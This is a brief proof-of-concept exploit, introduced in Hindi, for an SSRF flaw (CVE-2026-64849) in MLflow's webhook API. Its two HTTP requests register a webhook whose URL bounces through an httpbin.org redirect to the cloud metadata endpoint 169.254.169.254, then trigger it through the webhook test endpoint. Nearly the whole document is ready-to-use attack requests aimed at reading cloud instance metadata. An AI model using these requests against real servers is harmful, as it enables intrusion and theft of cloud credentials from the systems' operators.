
CVE-2026-64849 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: यह MLflow वेबहुक API में तैयार किए गए POST के माध्यम से SSRF को ट्रिगर करता है, तथा 169.254.169.254 से क्लाउड इंस्टेंस मेटाडेटा प्राप्त करता है।
POST /api/2.0/mlflow/webhooks HTTP/1.1
Host:
Content-Type: application/json
{"url": "https://httpbin.org/redirect-to?url=http://169.254.169.254/latest/meta-data/", "name": "poc", "events": [{"action": "CREATED", "entity": "REGISTERED_MODEL"}]}
POST /api/2.0/mlflow/webhooks/{id}/test HTTP/1.1